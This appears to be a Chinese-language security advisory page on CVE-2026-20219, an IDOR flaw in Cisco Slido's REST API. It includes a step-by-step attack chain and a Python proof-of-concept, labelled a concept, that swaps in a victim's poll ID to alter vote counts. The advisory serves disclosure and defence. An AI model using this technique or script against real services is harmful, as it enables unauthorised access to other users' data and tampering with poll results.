CVE-2026-20219 CVSS 5.4 中危

CVE-2026-20219 Cisco Slido REST API IDOR漏洞

披露日期: 2026-05-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-20219

漏洞类型

IDOR (不安全的直接对象引用)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Cisco Slido

漏洞概述

Cisco Slido的REST API组件中存在一处不安全的直接对象引用（IDOR）漏洞。经过身份认证的远程攻击者可利用此漏洞，通过构造特定的恶意请求绕过访问控制，从而非法获取其他用户的社交资料数据，甚至篡改测验和投票的结果。该问题源于API对直接对象引用的验证缺失，目前Cisco官方已修复此漏洞，系统自动更新，无需用户采取额外操作。

技术细节

该漏洞的核心在于Cisco Slido REST API实现中存在不安全的直接对象引用（IDOR）。应用程序在处理涉及用户对象（如社交资料）或业务对象（如测验、投票）的API请求时，未正确验证请求发起者是否拥有访问目标资源的权限。通常，API可能直接使用客户端提供的标识符（如用户ID或投票ID）来检索数据库中的记录，而未在服务器端进行严格的会话上下文校验。

利用方式上，攻击者首先需要拥有一个有效的低权限账户以通过身份验证（PR:L）。随后，通过拦截网络流量或分析API逻辑，识别出易受攻击的端点。攻击者可以通过修改请求参数中的ID值（例如将user_id修改为目标的ID），向服务器发送特制的HTTP请求。由于缺乏对象级别的访问控制检查，服务器会错误地返回目标用户的数据或接受对目标资源的修改操作。这导致机密性泄露（查看他人资料）和完整性受损（篡改投票结果）。

攻击链分析

STEP 1

1. 信息收集与认证

攻击者注册或获取一个Cisco Slido的低权限账户，并登录平台以获取有效的API访问令牌或会话Cookie。

STEP 2

2. API端点识别

攻击者通过拦截Web流量或使用目录扫描工具，分析REST API的请求结构，寻找包含可预测ID（如user_id, poll_id）的端点。

STEP 3

3. IDOR利用尝试

攻击者将捕获的API请求中的对象ID（如用户ID）替换为其他用户的ID，保持自己的认证令牌不变，向服务器发送特制请求。

STEP 4

4. 数据窃取或篡改

服务器因未校验ID归属，直接返回了目标用户的社交资料数据，或接受了攻击者对投票结果的修改请求，导致数据泄露或完整性破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Cisco Slido IDOR PoC Concept
# Target: Vulnerable REST API endpoint for user profiles or polls

target_api = "https://api.slido.com/v2/moderate/poll/{}"

# Attacker's authenticated headers (Obtained after login)
headers = {
    "Authorization": "Bearer <attacker_valid_token>",
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/json"
}

# Victim's Poll ID or User ID (Insecure Direct Object Reference)
target_object_id = "victim_poll_id_12345"

# Malicious payload to affect poll results
payload = {
    "option_id": "malicious_option_id",
    "vote_count": 9999
}

# Craft the request
exploit_url = target_api.format(target_object_id)

try:
    response = requests.put(exploit_url, json=payload, headers=headers)
    if response.status_code == 200:
        print("[+] Exploit Successful! Poll/Profile data modified or accessed.")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Cisco Slido (修复前版本)

防御指南

临时缓解措施

由于Cisco Slido属于SaaS服务，该漏洞已由Cisco官方在服务端完成修复，无需客户进行手动配置或安装补丁。建议用户关注官方安全公告，确认系统已应用最新更新，并定期检查账户的权限设置和活动日志，以确保没有异常行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表